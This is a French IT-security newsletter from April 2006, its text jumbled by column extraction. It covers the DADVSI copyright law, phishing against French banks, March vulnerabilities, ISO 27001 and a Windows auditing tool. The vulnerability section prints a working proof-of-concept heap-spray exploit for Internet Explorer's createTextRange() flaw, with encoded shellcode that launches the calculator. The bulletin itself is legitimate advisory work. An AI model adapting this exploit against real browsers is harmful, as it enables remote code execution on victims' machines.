LA SCURIT INFORMATIQUE

AVRIL 2006

LActu Scurit n2
Internet: le fourre-tout de linformation.
Le problme auquel nous som-
PLAN mes confronts aujourdhui est que
ces moyens de communication sont
POINT JURIDIQUE aussi utiliss dans le cadre de len-
Projet de loi relatif au Droit treprise, qui, par nature, a besoin de
dAuteur et aux Droits Voisins matriser son environnement.
dans la Socit de lInformation. Les menaces pullulent. Dsor-
mais, moins dune minute suffit
(page 2)
infecter un poste connect sans pro-
tection sur Internet.
Comment rendre Internet com-
NOUVELLE TENDANCE patible avec les entreprises? De
Le phishing, une attaque de plus nombreux moyens existentet ont t
en plus utilise par les pirates. implments au fil du temps au sein
(page 4) des rseaux dentreprise : firewalls,
anti-virus, systmes de dtection
dintrusion (IDS), etc.
Une menace nanmoins subsis-
ATTAQUES ET ALERTES te: comment grer le contenu du
MAJEURES Web? Comment vrifier quun
Description et analyse des atta- contentieux avec un client mcon-
ques et menaces les plus impor- >1997: Internet colonise massive- tent ne prenne pas de proportions
ment les entreprises. inquitantes? Comment garantir
tantes parues durant le mois de
>2002: LADSL fait ses dbuts. quaucun collaborateur ne publie
Mars.
>2004: Le haut dbit envahit les dinformations confidentielles par-
(page 6) foyers franais. tir de son email professionnel?
>2006: Lexplosion dInternet rend Comment lutter contre la dsinfor-
sa matrise dlicate. mation?
VOLUTION NORMES ET En un mot: comment raliser la
STANDARDS Il aura fallu 10 ans pour quIn- revue de presse de lInternet?
Prsentation de la norme de ternet soit peru comme la troisime Le gigantisme de la tche pose de
scurit certifiante ISO27001 rvolution industrielle. Contraire- nombreux problmes pratiques,
ment aux deux prcdentes, celle-ci auxquels sont rgulirement con-
(BS7799-2). fronts les entreprises. Tout le
sest impose sans aucun mode
(page 10) demploi. monde savoue un peu dpass par
Mme les spcialistes sy perdent: lampleur du phnomne qui sauto-
forums, blogs, Instant messaging, alimente.
OUTILS LIBRES mailing-list, newsgroups, mails, VoIP De plus en plus dobservateurs
Dcouvrez et suivez les volu- sont autant de nouveaux moyens de voient en Internet une crature dont
tions des outils libres les plus communiquer et dchanger. Cha- le contrle aurait chapp son
cun dispose de ses propres codes, de crateur.
utiles et efficaces. Pourtant, il existe certainement
ses spcificits. Ces outils sont mis
(page 13) la disposition de profanes. des moyens de limiter les risques.
De fait, tout devient per- Cest en tout cas ce quesprent les
misPuisquil est si facile de crer responsables de scurit et les servi-
son propre blog, puisquil est grisant ces de communications
de savoir que ses confidences les plus Nous avons donc dcid de relever
intimes seront parcourues par des ce dfi aux cts de nos clients afin
milliards de lecteurs potentiels, de trouver des solutions. Je vous ferai
pourquoi ne pas se laisser emporter part prochainement de lavancement
dans cette euphorie collective? de nos travaux.
Pourquoi ne pas prendre le TGV de Marc Behar
linformation?
XMCO PARTNERS - CABINET DE CONSEIL EN SCURIT DES SYSTMES DINFORMATION 1
www.xmcopartners.com
 LA SCURIT INFORMATIQUE AVRIL 2006

1. POINT JURIDIQUE:

PROJET DE LOI RELATIF AU

DROIT DAUTEUR ET AU
DROITS VOISINS DANS LA
SOCIT DE LINFORMATION

Ce mois-ci aura t marqu par une loi suivie

de prs par les internautes adeptes du Peer to
Peer et de la copie prive.

En effet la loi DADVSI (Droit d'Auteur et aux

Droits Voisins dans la Socit de l'Information)
devait proposer une solution aux problmes
du piratage informatique. En effet, les tl-
chargements sont la cause de bon nombre de
soucis dans lunivers phonographique et cin-
matographique.

XMCO | Partners

Petit rappel
Les divers sujets et amen-
dements de cette loi :
Le but initial des industriels dans
l'adoption de cette loi, tait dtu-
dier et de mettre en place sur les
uvres protgesdes dispositifs:
danti-copie qui interdit la re-
production dune uvre protge.
danti-usagequi permet de ne
lire certains fichiers qu partir de
certains logiciels ou matriels (ba-
ladeur).
d'identification de l'utilisateur
qui autorise la lecture aux utilisa-
teurs identifis possesseurs dune
license.
de tatouage de l'uvre qui per-
met de tracer luvre, de la redis-
tribuer et den interdire la lecture
au del dune date prdfinie.
de traage de l'usage qui enre-
gistre la transmission d'informa-
tions via internet vers un serveur
industriel chaque utilisation
d'une uvre.
Les promoteurs ont donc, la
fin du mois de dcembre, prsent
ce projet qui vise protger les
DRM (Digital Rights Management)
XMCO PARTNERS - CABINET DE CONSEIL EN SCURIT DES SYSTMES DINFORMATION
www.xmcopartners.com
ou GDN (Gestion de Droits Num- Une license tait alors propre un
riques). ordinateur et paye mensuellement
par les internautes.
Cette technique avait pour but
de restreindre la diffusion par copie Ds lors, de nombreux oppo-
des contenus numriques tout en sants, dont lAlliance Public-Artistes
grant les droits dauteur et les mar- et les partisans du logiciel libre, ont
ques dposes. fait part de leur mcontentement. Ils
Une architecture fut mme tudie estimaient que le gouvernement
afin de permettre lapplication de ce devait retirer ce texte qui allait
projet. lencontre des liberts individuelles.
Le principe tait le suivant: un ser-
veur stockait les fichiers protgs par
droit dauteur et le client possdait
un logiciel capable de consulter ces
fichiers (lecteur multimdia, MP3
).
Un utilisateur qui souhaitait tl-
charger un fichier devait fournir un
identifiant unique au serveur. Le
serveur envoyait alors le fichier chif-
fr demand spcialement pour ce
client. Enfin, lorsque lutilisateur
voulait consulter ce fichier tlchar-
g (par Internet), le lecteur tablissait
une connexion avec le serveur qui
sassurait que lutilisateur possde
bien une license valide linstant
prsent. Si ctait le cas, le lecteur
pouvait alors dchiffrer le fichier et
le lire.
2
 LA SCURIT INFORMATIQUE
AVRIL 2006
Historique
Bref retour en arrire et
explication des articles
adopts.
Le projet DADVSI commena
ds la fin du mois de dcembre. Un
projet de licence globale vit le jour.
L'amendement majeur avait pour
but de faire payer les internautes qui
tlchargent partir de rseaux Peer
to Peer, sous forme d'un abonne-
ment mensuel. Durant 2 jours, les
dputs ont dbattu et finalement
certains amendements ont tout de
mme t vots mais le projet de loi
DADVSI est repouss en Mars 2006.
Deux mois plus tard, la loi DADVSI
sera nouveau tudie par l'assem-
ble. Plusieurs thmes seront abor-
ds et divers points seront tudis.
Cinq thmes majeurs ont finalement
t adopts dont voici les conclu-
sions finales.
La license globale :
Le premier point concerne la li-
cense globale. Aprs une premire
proposition la fin du mois de d-
cembre, cet article sera finalement
rejet.
L'article 1, dont les dispositions
assimilent le tlchargement via les
rseaux Peer to Peer de la copie
prive, a tout d'abord t rejet puis
rintroduit. Une confusion totale
tait alors palpable l'Assemble.
Malgr les efforts des partisans de
cet article la license globale, qui ins-
taure une taxe des fournisseurs d'ac-
cs au titre de la copie prive, est
tout de mme rejete.
Le nouveau texte pousse l'utili-
sation des plateformes lgales.
Les protections DRM :
Le deuxime point concernant
les mesures de protection est enfin
reconnu par la loi. Tout contourne-
ment de telles protections sera d-
sormais considr comme un dlit.
Un pirate qui dveloppe des outils
de contournement risque 6 mois de
prison ferme et 30 000 euros
d'amende. Un individu qui utilise ces
techniques est passible dune
amende de 750 euros.
XMCO PARTNERS - CABINET DE CONSEIL EN SCURIT DES SYSTMES DINFORMATION
www.xmcopartners.com
L'interoprabilit :
L'exigence d'interoprabilit qui
impose tous fichiers tlchargs
lgalement sur Internet, d'tre lisi-
bles sur n'importe quel logiciel ou
matriel, a t accepte.
Cet article est donc vivement con-
test par Apple avec son application
de tlchargement en ligne Itunes.
En effet, les fichiers mp3 tl-
chargs partir du site d'Apple
taient jusqu' prsent seulement
lisibles par un Ipod ou le logiciel
Itunes. Dsormais, ces fichiers ne
devront plus tre protgs. Apple
craint donc une chute des ventes et
s'oppose farouchement une telle
mesure.
La copie prive :
Quatrime point : le primtre
de la copie prive sera maintenant
soumis aux mesures imposes par un
collge de Mdiateurs. Ce groupe
aura la charge de dfinir le nombre
de copies autorises dans le cadre de
la copie prive.
Une seule exception, la copie
prive de DVD, qui est dsormais
interdite par la loi.
Le P.V. numrique :
Enfin le dernier point et le plus
important pour les utilisateurs de
rseaux Peer to Peer concerne le
tlchargement de fichiers protgs
qui reste illgal et sera svrement
puni. Plusieurs sanctions contre les
tlchargements sauvages ont t
approuves et des amendes seront
adaptes en fonction du dlit.
Le tlchargement illicite d'une
uvre protge par droits d'auteur
cotera 38 euros. De plus, une
amende de 150 euros sera applique
pour la mise disposition via Inter-
net d'un tel fichier.
La duplication d'un DVD vido
verrouill cotera 750 euros et sa
mise en ligne cotera 30 000 euros.
Une brigade spcialise aura pour
charge de reprer les fraudeurs. Les
adresses IP connectes aux rseaux
Peer to Peer seront releves par un
officier de police judiciaire et en-
voyes au fournisseur d'accs afin de
rcuprer les noms des "pirates". On
peut se demander quels moyens
seront mis en uvre et comment
sera applique cette rpression. De
nombreuses difficults se posent...
Les dmarches administratives
pour chaque cas seront complexes, il
est donc probable que lEtat sanc-
tionne lourdement quelques inter-
nautes pour lexemple, en devenant
plus clment par la suite. Ces coups
mdiatiques seront consquents
pour effrayer les utilisateurs des
rseaux Peer to Peer.
Tout comme Apple, lAmrique
reste fermement oppose une telle
loi qui selon elle va lencontre
des liberts individuelles a soulign
le secrtaire dEtat Gutierrez. Le
Los Angeles Time a dailleurs
jug ce projet de pur protection-
nisme franais.
Ct allemand, la mise en place
dune loi similaire rprimanderait
plus svrement les fraudeurs avec
une peine maximale de 5 ans de
rclusion pour le partage de don-
nes!
3
 LA SCURIT INFORMATIQUE
AVRIL 2006

2. NOUVELLE TENDANCE :
LE PHISHING, UNE ATTAQUE DE PLUS
EN PLUS UTILISE PAR LES PIRATES.

Ce mois de Mars aura t marqu par un nombre important de

tentatives de Phishing.

Cette attaque en vogue dans le milieu des pirates se dveloppe

continuellement et pige un nombre consquent dutilisateurs.
Les prcdentes tentatives lencontre de banques trangres
paraissaient plus ou moins inefficaces en France, au vue des
moyens utiliss par les attaquants. Malheureusement, depuis le
dbut de lanne, plusieurs attaques, diriges vers les clients des
banques franaises, ont t rpertories.

XMCO | Partners

Le phishing une tendance confirme

En effet, de nombreux spcialistes saccordent le

dire. Sophos a publi en Fvrier une tude portant sur
600 utilisateurs. Le bilan savre lourd: 58% des salaris
dans les entreprises reoivent, au moins, un message par
jour, qui imite celui dune banque. 22% en reoivent
quotidiennement plus de cinq. Le phishing na donc ja-
mais t aussi prsent.

Il est important de rappeler que cette technique con-

siste envoyer un email diffus grande chelle pour
conduire le plus grand nombre de personnes crdules se
connecter sur un site pirate. Les attaquants contactent
simultanment des dizaines de milliers de personnes, et mail malveillant au couleurs de la Socit Gnrale
comptent sur ce grand nombre pour qu'au moins une
fraction des destinataires tombe dans le pige tendu.

Plusieurs raisons (validation de compte, problme de

maintenance, vrification des informations ) sont invo-
ques pour convaincre lutilisateur de suivre le lien vers le
site pirate.

Le destinataire du courriel malveillant est alors redi-

rig vers un site qui ressemble celui de sa banque pour
rcuprer les informations sensibles entres par la victime
(nom dutilisateur, mot de passe, donnes bancaires).

Notons que, les pirates informatiques, utilisateurs de

ce type dattaque, apportent une attention grandissante
aux dtails. En effet, les internautes sont de plus en plus
informs sur ce genre de pratiques. De ce fait, seules les
contrefaons identiques loriginal pourront permettre de
duper le plus grand nombre dutilisateurs.
mail malveillant au couleurs du Crdit Lyonnais

XMCO PARTNERS - CABINET DE CONSEIL EN SCURIT DES SYSTMES DINFORMATION 4

www.xmcopartners.com
 LA SCURIT INFORMATIQUE AVRIL 2006

Longtemps mal traduits dans leur langue, les franais
pouvaient facilement identifier les emails malveillants.
Dsormais, les emails malicieux sont trs bien crits et les
sites associs reproduisent parfaitement les sites des ban-
ques victimes.
Les pirates utilisent plusieurs techniques de contour-
nement des filtres antispam et des filtres antiphishing. Le
texte rdig est, en fait, une image accompagne d'un
texte et d'un titre variable cach dans le code source du
message. Les filtres bass sur l'analyse du texte sont ainsi
tromps.
The Phishing Incident Reporting & Termination Squad
PhishRegistry.org
Ces deux sites permettent de grer ce genre dincident. Ils
reportent lattaque auprs des autorits et alertent les
clients enregistrs en cas de tentative de phishing.
Voici leur adresse respective :
http://www.phishregistry.org/
http://castlecops.com/modules.php?name=Fried_Phish

A lheure o nous crivons ces lignes, 56 attaques de

Phishing ont t identifies. La plupart visent des sites
dachat en ligne ou des banques trangres. Malgr tout,
les banques franaises ont aussi t touches.

Le crdit Lyonnais, la Socit Gnrale, la BNP,

HSBC, AOL et Microsoft Update font parti des nom-
breuses victimes du mois.
Les attaques des banques franaises proviennent, sans
aucun doute, du mme pirate qui a hberg les sites sur
des serveurs Corens.
Une fois les victimes sur le site pirate et leurs informations
confidentielles saisies, les donnes sont rcupres et la
victime est redirige vers le site officiel de la banque en
question.
Vous trouverez ces attaques dans nos prcdents bulletins:

n1142854718 (BNP)
n 1142930896 (Socit Gnrale) Site officiel
n1142963045 (Crdit Lyonnais).

Nous vous rappelons, titre prventif, qu'aucune

banque ou site d'achat en ligne n'envoie de courrier lec-
tronique ses clients sur les mots de passe ou bien sur les
coordonnes bancaires. Nous vous conseillons donc de ne
jamais ouvrir le lien d'un email dont vous n'tes pas cer-
tain de la lgitimit et surtout, de ne jamais entrer vos
informations bancaires par le biais d'un lien reu par
email.

Xmco Partners dveloppe actuellement un service de

surveillance pour des socits victimes de telles attaques.
Notre logiciel surveillera le web la recherche darticles,
de blogs, de logiciels, de sites web, dURL, ou tout ce qui
porte atteinte limage de marque de lentreprise. Cha-
que jour une analyse sera ralise par nos quipes et des
bulletins seront alors remis aux clients.

Ces bulletins journaliers ont pour but d'alerter au plus tt

les entreprises victimes d'attaque. En effet, ces entreprises
doivent ragir rapidement en mettant en place une cellule
de crise et des mesures dfinies auparavant par les diff-
rents dpartements concerns (service communication,
service juridique, service informatique).

Ainsi des dispositions pourront tre adoptes sur le site

lgitime de la socit en prvenant les clients par des mes-
sages explicites ou autres.
Site pirate
Enfin, deux nouveaux sites viennent d'tre mis a la
disposition des internautes:
XMCO PARTNERS - CABINET DE CONSEIL EN SCURIT DES SYSTMES DINFORMATION 5
www.xmcopartners.com
 LA SCURIT INFORMATIQUE AVRIL 2006

3. ATTAQUES MAJEURES :
TOP 5 DU MOIS DE MARS

Le mois de mars a t marqu par la publication dune faille

critique de la plate-forme Windows et de nombreuses vulnra-
bilits et exploits pour Internet Explorer. Dautre part, Send-
mail, qui est largement utilis dans les entreprises, est aussi
touch par une vulnrabilit.

XMCO | Partners

MS06-012 La quatrime faille rsulte dune erreur de mmoire

Excution de code distance via un do-
cument Office malicieux
Plusieurs vulnrabilits prsentes au sein du produit
Office de Microsoft ont t corriges. La plupart des ver-
sions de la suite bureautique de Microsoft sont concer-
nes. Seuls les produits Microsoft Office Excel 2000 Vie-
wer, Microsoft Office Excel 2002 Viewer, Microsoft Word
2003, Microsoft Outlook 2003 et Microsoft PowerPoint
2003 ne sont pas affects.
lors de louverture dun fichier contenant un graphique
malform.
La cinquime vulnrabilit vient de la soumission
dun enregistrement malform sur un document Office
qui est ensuite exploit par lattaquant.
Enfin la dernire faille provient dune corruption de
la mmoire et peut tre exploite en construisant un bor-
dereau de routage spcialement conu dans un document
Office.

Un attaquant peut compromettre distance un sys-

tme vulnrable en crant un fichier Excel malicieux.
Lors de louverture dun tel document, le pirate pourrait
excuter du code en fonction des droits de la victime. En
dautres termes, lattaquant peut insrer un cheval de
Troie dans un document Office et prendre ainsi le con-
trle du poste de lutilisateur abus.

A noter que si la victime est administrateur de son

systme, le contrle total de la machine est possible.

Les cinq premires failles sont issues du logiciel Excel.

Le premier problme rsulte de lutilisation dune plage
de donnes malformes qui pourrait corrompre la m-
moire du systme.
La seconde faille est due une erreur faite lors de lana-
lyse du format dun fichier malform.

Troisimement, un problme peut survenir lors de

lutilisation dune description malforme et provoque ainsi
une erreur de mmoire du systme.

XMCO PARTNERS - CABINET DE CONSEIL EN SCURIT DES SYSTMES DINFORMATION 6

www.xmcopartners.com
 LA SCURIT INFORMATIQUE
AVRIL 2006
Toutes ces vulnrabilits peuvent tre exploites par le
biais d'un serveur web pirate ou par l'envoi d'emails mali-
cieux.
Malgr tout, une attaque ne peut tre directe, lexploita-
tion de ces vulnrabilits ncessite lintervention de lutili-
sateur, savoir le tlchargement et lexcution du fichier
spcialement conu.
Aucun programme malveillant qui exploite cette faille
n'est actuellement disponible sur Internet. Cependant, des
pistes ont t dvoiles. Il est probable que diffrentes
preuves de concept verront le jour prochainement.
Programmes vulnrables:
Microsoft Office 2000 SP 3
Microsoft Office XP SP 1 / 2/ 3
Microsoft Works Suites
Microsoft Office X pour Mac
Microsoft Office 2004
Criticit : Eleve
Rfrence Xmco: n 1142413618
KB917077
Excution de code distance et Dni de
service via Internet Explorer (createTex-
tRange())
Aprs la publication de plusieurs programmes qui
permettent dattaquer et dexcuter distance des com-
mandes arbitraires ou bien de provoquer des dnis de
service, Microsoft publi un bulletin dalerte pour son
navigateur Internet. Ce bulletin expose diffrentes solu-
tions de contournements pour diminuer les risques dex-
ploitation en attendant la publication du correctif officiel.
XMCO PARTNERS - CABINET DE CONSEIL EN SCURIT DES SYSTMES DINFORMATION
www.xmcopartners.com
Plusieurs vulnrabilits ont t dcouvertes. Les failles
proviennent d'erreurs de traitement des tags ayant plu-
sieurs vnements tels que : onhelp, onclick, ondblclick,
onkeyup, onkeydown, onkeypress... En incitant la viste
dun site Web malicieux, la page HTML spcialement
conue pourrait provoquer l'arrt du navigateur.
Une autre faille vient dune mauvaise gestion de la
mmoire. En effet, la fonction create.TextRange() fait
appel des espaces mmoire non allous. Ce dysfonc-
tionnement peut tre exploit par un attaquant distant
afin dexcuter des commandes arbitraires sur un systme
vulnrable.
Pour exploiter cette faille, lattaquant incitera la victime
visiter une page HTML malveillante pralablement mis
en place.
Depuis la divulgation de cette vulnrabilit, de nom-
breuses preuves de concept ont t publies. Ces pro-
grammes permettent de gnrer automatiquement des
pages HTML malicieuses. Une fois charges, ces pages
exploitent la faille et excutent du code arbitraire.
Plusieurs programmes malveillants ont t publis. Une
simple visite du site qui contient la page HTML malfor-
me permet lexploitation de la vulnrabilit.
Le programme le plus malicieux cr ce jour, permet
uniquement de lancer la calculatrice. Lexploit prsent
ci-dessous gnre ces pages HTML utilises pour piger
les victimes. Notons que cette version inoffensive peut tre
aisment modifie par un pirate afin dexcuter des ac-
tions plus prjudiciables.
7
 LA SCURIT INFORMATIQUE
AVRIL 2006

<input type="checkbox" id="blah">

<SCRIPT language="javascript">

shellcode = unescape(
"%u9090%u9090%u9090%uC929%uE983%uD9DB%uD
9EE%u2474"+"%u5BF4%u7381%uA913%u4A67%u83C
C%uFCEB%uF4E2%u8F55"+"%uCC0C%u67A9%u89C1
%uEC95%uC936%u66D1%u47A5%u7FE6"+"%u93C1%
u6689%u2FA1%u2E87%uF8C1%u6622%uFDA4%uFE69 1. Laffectation du code malicieux la variable
"+"%u48E6%u1369%u0D4D%u6A63%u0E4B%u9342%u shellcode. Ce code sera excut lors de louver-
9871%u638D"+"%u2F3F%u3822%uCD6E%u0142%uC0 ture de la page. Dans notre cas nous lancerons
C1%uECE2%uD015%u8CA8"+"%uD0C1%u6622%u45A la calculatrice de Windows.
1%u43F5%u0F4E%uA798%u472E%u57E9"+"%u0CCF%
u68D1%u8CC1%uECA5%uD03A%uEC04%uC422%u6C
40"+"%uCC4A%uECA9%uF80A%u1BAC%uCC4A%uEC
A9%uF022%u56F6"+"%uACBC%u8CFF%uA447%uBFD
7%uBFA8%uFFC1%u46B4%u30A7"+"%u2BB5%u8941%
u33B5%u0456%uA02B%u49CA%uB42F%u67CC"
+"%uCC4A%uD0FF");
bigblock = unescape("%u9090%u9090");
slackspace = 20 + shellcode.length

while (bigblock.length < slackspace) 2. Mise au point pour mapper correctement le

bigblock += bigblock; code malicieux en mmoire.

fillblock = bigblock.substring(0, slackspace);

block =
bigblock.substring(0,bigblock.length-slackspace);

while(block.length + slackspace < 0x40000)

block = block + block + fillblock;

memory = new Array();

3. Mise en place de la charge utile sur la pile
dexcution du programme. Une fois la fontion
createTextRange() appelle, le programme
for ( i = 0; i < 2020; i++ ) excutera le shellcode ci-contre.
memory[i] = block + shellcode;

Amorage de lattaque avec lexploitation

de la vulnrabilit de createTextRange()
var r =
document.getElementById('blah').createTextRange();

</script>

Preuve de concept lanant la calculatrice de Windows.

A louverture de la page HTML gnre par ce pro-

Programmes vulnrables:
gramme, lappel de la fonction createTextRange() (4)
Internet Explorer 6.0
effectuera un accs illicite la mmoire. Cet effet de bord
Internet Explorer 7 beta 2
permet dexcuter le code malveillant plac en mmoire
antrieurement (3). Dans le cas prsent le code mal-
Criticit : Eleve
veillant excut est celui de la calculatrice de Windows
(1). Rfrence Xmco :
n 1143133960
Notons quil est ais de modifier ce programme au vue n 1143105301
dune utilisation malveillante. n 1143447561
n1142853400
n 1143019395

XMCO PARTNERS - CABINET DE CONSEIL EN SCURIT DES SYSTMES DINFORMATION 8

www.xmcopartners.com
 LA SCURIT INFORMATIQUE AVRIL 2006

Cheval de Troie install partir dune animation Flash

(.swf)
Macromedia Products Unspecified Re-
mote Command Execution Vulnerabili-
ties

Plusieurs vulnrabilits ont t dceles au sein du lec-

teur Flash de Macromedia.

Les diffrents problmes rsultent de la mauvaise gestion

de fichiers SWF malforms chargs dans le lecteur Flash.
Un attaquant pourrait compromettre un systme vuln-
rable avec la cration dun fichier dextension SWF h-
berg sur un site web.
Un utilisateur qui visiterait un site malicieux pourrait
donc tre victime dune telle attaque.
La vulnrabilit exploite vient d'une erreur prsente
dans l'application Mail implmente par le systme
d'Apple. En effet, ce programme gre incorrectement
certains emails malforms (avec un champ "Real Name"
excessivement long).
Cette absence de validation pourrait tre exploite par un
attaquant distant afin de causer un dbordement de tam-
pon mmoire et ainsi excuter des commandes arbitraires
sur un systme vulnrable.

Programmes vulnrables: Mac OS X

Criticit : Eleve
Rfrence Xmco:
n1142333841(Correctif)
n1142332433(Exploit)

Compromission dun systme avec des mails malicieux

Vulnrabilit dans Sendmail

Une faille dans le clbre logiciel serveur de mail send-

Aucune autre information n'a actuellement t com-
munique par l'diteur. Cependant, une mise jour est
disponible sur le site de lditeur.
mail vient dtre publie. Ce problme, qui affecte tou-
tes les distributions, rsulte d'une corruption de la m-
moire lors de l'envoi de donnes malicieuses durant cer-
tains intervalles de temps. Ceci peut permettre l'atta-
quant d'excuter des commandes avec les privilges de
l'utilisateur.

Programmes vulnrables: Lecteurs Flash

Criticit : Eleve
Rfrence Xmco: n 1142437567

Excution de code arbitraire avec lapplication Mail

Exploit pour Mail de Mac OS X
Programmes vulnrables: Toutes les plateformes
Apple, qui ft la cible des attaques majeures du mois de
fvrier 2006, a rcemment publi un correctif pour deux Criticit : Eleve
de ses produits: Mail et Safari. Rfrence Xmco:
Lune de ces failles est dsormais facilement exploitable n1143620172 (F-Secure)
Il suffit dutiliser la preuve de concept publie peu de n1143536363 (HP-UX)
temps aprs. n1143193611 (RED-HAT)
n1143127834 (SUSE)
n1143125351 (SOLARIS)
n1143122131 (DEBIAN)
n1143119727 (FEDORA)
n1143110560 (AIX)
XMCO PARTNERS - CABINET DE CONSEIL EN SCURIT DES SYSTMES DINFORMATION 9
www.xmcopartners.com
 LA SCURIT INFORMATIQUE
AVRIL 2006
4. EVOLUTION
DE NORMES :
Les normes lies la scurit informa-
tique voluent continuellement et
donnent naissance la premire certi-
fication dans le domaine. Les acteurs
financiers, les clients et les partenaires
des grandes entreprises accueillent
cette nouvelle avec un grand intrt car
elle reprsente une garantie suppl-
mentaire.
XMCO | Partners
La naissance dune norme de scu-
rit de linformation.
Les normes ISO 17799 et
ISO27001 (BS7799-2)
Les normes ISO sont, depuis prs
de 10 ans, la rfrence en matire de
scurit. Un grand nombre dentre-
prises tournes vers lexportation et
linternational ont ressenti la nces-
sit dtablir des rfrentiels mon-
diaux de scurit. Ceci afin dtablir
un climat de confiance auprs des
clients et des partenaires mfiants.
Les normes ISO sont apparues. Elles
sont dsormais gres par une Or-
ganisation non gouvernementale qui
fdre des organismes nationaux et
s'occupe d'dicter des normes inter-
nationales.
Il est important de connatre les
diffrents standards qui dfinissent
les normes de certification d'une
organisation en scurit des systmes
d'informations. Cest pourquoi nous
expliquerons les grandes lignes des
normes ISO17799 et ISO27001
(BS7799-2). Ces dernires ont t
mises en place pour prciser les
mesures et les mthodes de mana-
gement dun systme dinformation.
Lvolution de BS7799 lISO
17799.
La norme ISO 17799
XMCO PARTNERS - CABINET DE CONSEIL EN SCURIT DES SYSTMES DINFORMATION
www.xmcopartners.com
La norme anglaise BS 7799 est
lorigine de cette norme ISO.
Cre en 1995 par le British Stan-
dard Institute (quivalent de
lAFNOR en France), cette norme
instaure des standards de qualit et
de performance pour lindustrie. En
1999, elle connat un succs inter-
national et est adopte en tant que
ISO/IEC 17799:V2000. Seuls des
pratiques et des contrles sont dic-
ts par ce texte. Aucune rfrence
une quelconque certification ny est
mentionne.
Un an plus tard, une rvision sera
effectue afin duniformiser lenvi-
ronnement de la scurit informati-
que. Elle aboutira, en mars 2005,
la version 2 de la norme ISO 17799.
Concrtement, lISO 17799 se dis-
tingue par sa reconnaissance et sa
diffusion mondiale auprs des plus
grands comptes. Cependant, elle
ne dfinit aucune exigence (mat-
rielle ou logicielle) et est, de ce fait,
remise en question. Elle est donc
cense donner une certification v-
ritable avec la version BS 7799-2.
La norme ISO 17799 se compose de
10 chapitres. De nombreux points
importants y sont abords:
3 chapitres sont ddis au ma-
nagement de la scurit des infor-
mations (les politiques de scurit,
lorganisation, la classification et le
contrle).
2 chapitres sur la scurit du
personnel (contrle lors du recru-
tement, formation et sensibilisa-
tion) et sur la scurit physique
(quipements et primtre de scu-
rit).
5 chapitres sur le dveloppement
de lexploitation des systmes
dinformation (contrles daccs,
dveloppement et maintenance des
systmes, gestion de la continui-
t).
Chaque chapitre est
articul autour de
plusieurs points: les
objectifs, les mesures
mettre en uvre, les
recommandations et les contrles
effectuer.
LISO 17799 est donc une sorte
dinventaire des bonnes pratiques et
des points importants vrifier au
sein dun systme dinformation.
10
 LA SCURIT INFORMATIQUE
AVRIL 2006

Enfin une norme certifiante.

La norme ISO27001 (BS7799-2).

En octobre 2005, le standard BS 7799-2 est adopt par l'ISO. Il introduit le nouveau standard international ISO/IEC
27001:2005.

Plus quun simple guide la version BS7799-2 soccupe, quant elle, de prsenter et de dfinir les mthodes appli-
quer pour assurer une bonne gestion de la scurit. Elle ne sassure pas de lefficacit des moyens mis en uvre mais de
lexistence relle de ceux-ci. Une dmarche PDCA (Plan, Do, Check, Act) galement appele roue de Deming prcise
les tapes de lapplication des mesures de scurit (voir schma ci-dessous).

Schma du site http://www.ysosecure.com

Depuis Mars 2005, la certification BS7799-2 est enfin possible. Elle garantit quune entreprise a mis tous les moyens
en place pour matriser son systme dinformation. Elle assure ainsi une crdibilit et une confiance certaine auprs des
clients.

Celle-ci est base sur deux tapes: une tude de la documentation de lentreprise audite et une vrification de la
gestion mis en uvre afin dassurer la scurit du systme.
Les entreprises qui adoptent l'ISO 27001 sont libres de choisir les contrles spcifiques adapts aux besoins et aux risques
de chacun. Prs de 1800 socits ont ainsi t certifies au standard BS 7799 part 2 (ou les quivalents nationaux). Ce
besoin se dveloppe considrablement.
A noter, que cette certification n'est pas impose comme la loi Sarbannes-Oxley (voir numro 1 du mois de Mars d'Actu
Scurit"). Cependant, les partenaires et les clients sont de plus en plus attentifs ces normes car elles sont sources de
crdibilit.

La certification est importante dans une entreprise car elle donne une dimension sure et internationale. Toute certi-
fication se dfinie comme une mthode qui atteste, par l'intermdiaire d'une vrification indpendante et neutre, qu'un
systme rpond aux normes de qualit.

Malgr lengouement pour ces certifications, peu dorganismes franais permettent de certifier BS7799-2 (LSTI est
le principal acteur dans ce domaine).

XMCO PARTNERS - CABINET DE CONSEIL EN SCURIT DES SYSTMES DINFORMATION 11

www.xmcopartners.com
 LA SCURIT INFORMATIQUE AVRIL 2006

Promisec Spectator surveille votre parc Windows sans
agent.
Identifier les machines non con-
formes et surveiller lapplication
de votre politique de scurit.
Avec la mise en place de diverses certifications
(ISO127001) et daudits de scurit en rapport avec la loi
Sarbannes-Oxley (voir article sur ce sujet dans Actu-Se-
curit de Mars 2006), les RSSI doivent trouver des so-
lutions appropries afin de vrifier la bonne application
de leur politique de scurit.
Malheureusement, le problme majeur rside dans ce
contrle et dans lanalyse de parcs informatiques impor-
tants.
Comment contrler rapidement et efficacement lappli-
cation de cette politique?
Lesutilisateurs de votre rseaux utilisent-ils des logiciels
de messagerie instantane, des clefs USB personnelles
ou encore des modems?
quelques clics tre dtects puis rassembls dans un ta-
bleau qui pourra tre export sous forme de rapport.
Toutes les menaces peuvent tre dtectes. Cependant,
il est galement possible de les radiquer en quelques clics
partir de la mme solution logicielle.
Plusieurs analyses peuvent tre excutes simultanment.
En effet, de nombreuses configurations spcifiques peu-
vent tre dfinies et lances de manire indpendante.
Lanalyse est effectue partir dun unique poste.
Loutil peut intervenir directement sur la base de registre
du poste distant. Dans le cas o une valeur serait non
conforme, il est possible de forcer lapplication de la poli-
tique de scurit en modifiant cette valeur.
Ci-dessous, une capture dcran vous montre comment
dfinir une clef de registre analyser. Ici, nous souhaitons
vrifier si les crans de veille sont protgs par un mot de
passe.

Dautres points plus critiques font galement lobjet

dune analyse, lapplication des correctifs Microsoft ou
lexistence des comptes invits ou encore lutilisation dun
proxy etc...
La gestion de ces paramtres devient donc un vritable
casse-tte pour les responsables en scurit et les admi-
nistrateurs rseaux.

Conscients de cette problmatique, les diteurs nous

proposent diverses solutions. Parmi elles, une est base sur
le protocole WMI (Windows Management Instrumenta-
tion). Lavantage de cette approche est dobtenir une so-
lution simple et efficace. En effet, une analyse prcise,
voire minutieuse, du registre des machines scannes est Spectator est un vritable couteau suisse. En effet,
effectue en peu de temps. Ainsi, partir du port 135 les possibilits de configuration permettent la mise en
ouvert sur les machines cibles, ce programme peut facili- place des tests pointus en adquation avec la politique de
ter la recherche dinformations, de fichiers, de matriels, scurit dfinie. Une fois en place ces tests peuvent tre
de logiciels et de processus actifs divers. lancs de manire rgulire et planifie afin dobtenir un
rel baromtre de la conformit des rseaux surveills.
